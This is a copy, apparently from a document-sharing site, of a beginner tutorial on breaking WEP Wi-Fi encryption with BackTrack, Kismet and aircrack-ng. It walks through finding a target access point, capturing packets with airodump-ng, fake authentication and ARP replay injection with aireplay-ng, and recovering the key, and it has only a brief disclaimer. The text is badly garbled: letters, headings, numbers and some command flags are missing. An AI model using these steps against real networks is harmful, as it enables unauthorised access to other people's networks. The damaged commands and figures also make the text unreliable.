Professional Documents
Culture Documents
SEO, Scripting and Politics
is tutorial is intended for user¶s wit little or no experience wit linux or wifi. e folks over
atremote-exploit ave released ³Backtrack´ a tool w ic makes it ridiculously easy to access any
network secured by WEP encryption. is tutorial aims to guide you t roug t e process of using it
effectively.
c
c !
"c
" is a bootable live cd wit a myriad of wireless and tcp/ip networking tools. is tutorial
will only cover t e included kismet and aircrack-ng suite of tools.
##
&$
Ñ
Access Point
a wireless router
Ñ ·
Media Access Control address, a unique id assigned to wireless adapters and
routers. It comes in exadecimal format (ie 00
ef
a3
a)
Ñ !(
Access Point¶s MAC address
Ñ !(
Access Point¶s Broadcast name. (ie linksys, default, belkin etc) Some AP¶s will not
broadcast t eir name but Kismet may be able to detect it anyway
Ñ c·!)*
MS-Dos like command line interface. You can open t is by clicking t e black box
icon next to t e start key in backtrack
Ñ
s ort for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
Ñ
s ort for WiFi Protected Access. a more secure protocal t an WEP for wireless
networks. NOE
t is tutorial does not cover cracking WPA encryption
Since Backtrack is a live CD running off your cdrom, t ere is now ere t at you can write files to
unless you ave a linux partition on your ard drive or a usb storage device. Backtrack as some
NFS support so you will be able to browse to your windows based ard drive s ould you ave one,
but it will mount t e partition as ³read-only´. I dual boot windows and ubuntu on my laptop so I already
ave a linux swap partition and a reiserfs partition. Backtrack ad no problem detecting t ese and
mounting t em for me. o find your ard drive or usb storage device, just browse to t e /mnt folder in
t e file manager. ypically a ard drive will appear named somet ing like da or da if you ave
more t an one partition on t e drive. Alternately db could s ow if you ave more t an one ard
disk. Having somew ere to write files t at you can access in case you need to reboot makes t e
w ole process a little easier.
(!
*!·c
Hacking into someone¶s wireless network wit out permission is probably against t e law. I wouldn¶t
recommend doing it. I didn¶t break into anyone else¶s network w ile learning ow to do t is.
(!·*·)!)
+
Place t e backtrack CD into your cd-rom drive and boot into Backtrack. You may need to c ange a
setting in your bios to boot from cd rom. During boot up you s ould see a message like ³Hit ctrl+esc to
c ange bios settings´. C anging your first boot device to cdrom will do t e trick. Once booted into
linux, login as root wit username
root password
toor. ese are t e default username and
password used by backtrack. A command prompt will appear. ype startx to start KDE (a µwindows¶
like workspace for linux).
Once KDE is up and running start kismet by clicking on t e start key and browsing to Backtrack-
>Wireless ools -> Analyzers ->Kismet. Alternatively you can open a erminal and type
kismet
Kismet will start running and may prompt you for your wireless adapter. C oose t e appropriate
adapter, most likely µat 0ƍ, and sit back as kismet starts detecting networks in range.
iwconfig
W ile kismet detects networks and various clients accessing t ose networks you mig t want to type
µs¶ and t en µQ¶ (case sensitive). is sorts all of t e AP¶s in your area by t eir signal strengt . e
default µautofit¶ mode t at kismet starts up in doesn¶t allow you muc flexibility. By sorting AP¶s by
signal strengt you can scroll t roug t e list wit t e arrow keys and it enter on any AP you want
more information on. (side note
w en selecting target AP keep in mind t is tutorial only covers
accessing ost AP¶s t at use WEP encryption. In kismet t e flags for encryption are Y/N/0. Y=WEP
N=Open Network- no encryption 0= ot er
WPA most likely.) Furt er reading on Kismet is
available ere.
Select t e AP (access point) you want to access. Copy and paste t e broadcast name(essid), mac
address(bssid), and c annel number of your target AP into a text editor. Backtrack is KDE based so
you can use kwrite. Just open a terminal and type in µkwrite¶ or select it from t e start button. In
Backtrack¶s terminal to copy and paste you use s ift+ctrl+c and s ift+control+v respectively. *#
$
#
%
$
$ You can also use airmon to do
t is manually. airmon-ng -h for more elp wit t is
,
Open up a new terminal and start airodump so we can collect ARP replies from t e target AP.
Airodump is fairly straig t forward for elp wit t is program you can always type ³airodump-ng - ´ at
t e command prompt for additional options.
airodump-ng at 0 -w /mnt/ da/ ome/ryan/belkin_slax_rcu 9
.
''
aireplay-ng - 0 -e belkin -a 00
33
- 00
fe
33
f
e at 0
Ñ ^+ at t e beginning specifies t e type of attack. In t is case we want fake aut entication wit
AP. You can view all options by typing aireplay-ng -h
Ñ - specifies t e delay between attacks
Ñ ^ is t e essid tag. belkin is t e essid or broadcast name of my target AP. Linksys or default
are ot er common names
Ñ ^ is t e bssid tag(MAC address). 00
33
is t e MAC address of t e target AP
Ñ ^' is your wireless adapters MAC addy. You can use macc anger to view and c ange your
mac address. macchanger -s ath0
/
%
0
'
%
aireplay-ng -3 -b 00
33
- 00
fe
33
f
e at 0
)
As aireplay runs, ARP packets count will slowly increase. is may take a w ile if t ere aren¶t many
ARP requests from ot er computers on t e network. As it runs owever, t e ARP count s ould start
to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate
wit t e ap via step 3. ere is no need to close t e open aireplay terminal window before doing t is.
Just do it simultaneously. You will probably need somew ere between 00-00k IV data packets for
aircrack to break t e WEP key.
1
( %
'"
'
Find t e location of t e captured IVS file you specified in step . en type in a terminal
Once you ave enoug captured data packets decrypting t e key will only take a couple of seconds.
For my AP it took me 380k data packets. If aircrack doesn¶t find a key almost immediately, just sit
back and wait for more data packets.
If t is guide doesn¶t fully answer your questions you can always refer to t e forums at remote-
exploit.org